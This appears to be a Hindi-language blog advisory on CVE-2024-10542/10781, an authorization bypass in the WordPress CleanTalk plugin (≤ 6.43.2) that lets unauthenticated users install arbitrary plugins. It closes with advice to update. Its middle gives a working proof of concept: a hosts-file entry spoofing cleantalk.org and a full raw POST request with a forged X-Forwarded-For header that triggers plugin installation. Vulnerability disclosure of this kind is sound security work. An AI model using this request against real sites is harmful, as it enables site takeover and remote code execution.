
WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 बिना प्रमाणीकरण के मनमाना प्लगइन इंस्टॉलेशन भेद्यता के प्रति संवेदनशील है।
इस दस्तावेज़ में CVE-2024-10542 के संबंध में दी गई जानकारी केवल सीखने और शैक्षिक उद्देश्यों के लिए है। हम इस जानकारी के किसी भी हानिकारक उद्देश्यों के लिए उपयोग को प्रोत्साहित या अधिकृत नहीं करते हैं, जिसमें शोषण (exploitation), सिस्टम के साथ छेड़छाड़, या अन्य अवैध गतिविधियाँ शामिल हैं, लेकिन इन्हीं तक सीमित नहीं हैं।
लगातार जटिल होते डिजिटल परिदृश्य में, कई साइट मालिकों के लिए वेबसाइटों की सुरक्षा सुनिश्चित करना सर्वोपरि है। हाल ही में, दो गंभीर कमजोरियाँ खोजी गई हैं जो WordPress साइटों के लिए एक महत्वपूर्ण खतरा पैदा करती हैं। ये कमजोरियाँ प्रसिद्ध CleanTalk प्लगइन को प्रभावित करती हैं, जो स्पैम सुरक्षा, एंटी-स्पैम उपाय और फ़ायरवॉल प्रदान करता है। इस स्थिति को और भी गंभीर क्या बनाता है? आइए गहराई से जानें!
CVE-2024-10542 और CVE-2024-10781 के रूप में ट्रैक की गई दो कमजोरियाँ बिना प्रमाणीकरण वाले हमलावरों (unauthenticated attackers) को संवेदनशील साइटों पर दुर्भावनापूर्ण प्लगइन्स इंस्टॉल और सक्रिय करने की अनुमति दे सकती हैं। यह न केवल साइट की प्रतिष्ठा को खतरे में डालता है, बल्कि हमलावरों के लिए रिमोट कोड निष्पादित करने का दरवाज़ा भी खोलता है। 10 में से 9.8 के CVSS स्कोर के साथ, यह स्पष्ट है कि ये कमजोरियाँ अत्यंत खतरनाक श्रेणी में आती हैं। Wordfence के अनुसार, दोनों कमजोरियाँ एक प्राधिकरण बाइपास (authorization bypass) समस्या से संबंधित हैं, जो किसी दुर्भावनापूर्ण अभिनेता (malicious actor) को मनमाने प्लगइन्स इंस्टॉल और सक्रिय करने की अनुमति दे सकती हैं। यदि सक्रिय किया गया प्लगइन स्वयं कमजोर है, तो यह आगे चलकर रिमोट कोड निष्पादन का मार्ग प्रशस्त कर सकता है।
सबसे पहले, दुर्भावनापूर्ण उपयोगकर्ता अपने ऑपरेटिंग सिस्टम पर अपनी hosts फ़ाइल सेट करेंगे:
127.0.0.1 cleantalk.org
जिसके बाद वे इस प्रकार एक अनुरोध भेजते हैं:
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
spbc_remote_call_action=install_plugin&plugin_name=apbct
साइबर सुरक्षा हर साइट मालिक की साझा ज़िम्मेदारी है। प्लगइन्स को अद्यतन रखकर और संभावित कमजोरियों के प्रति सतर्क रहकर, हम अपनी साइटों को दुर्भावनापूर्ण हमलों से बचा सकते हैं। सुनिश्चित करें कि आपने CleanTalk को नवीनतम संस्करण में अपडेट कर लिया है और अधिकतम सुरक्षा सुनिश्चित करने के लिए अन्य प्लगइन्स की नियमित जाँच करते रहें। याद रखें, छोटे कदम बड़ी आपदाओं को रोक सकते हैं!
अल्लाह, मुहम्मद स.अ.व., mikemyers, Markdown Monster, मेरा परिवार, और आप?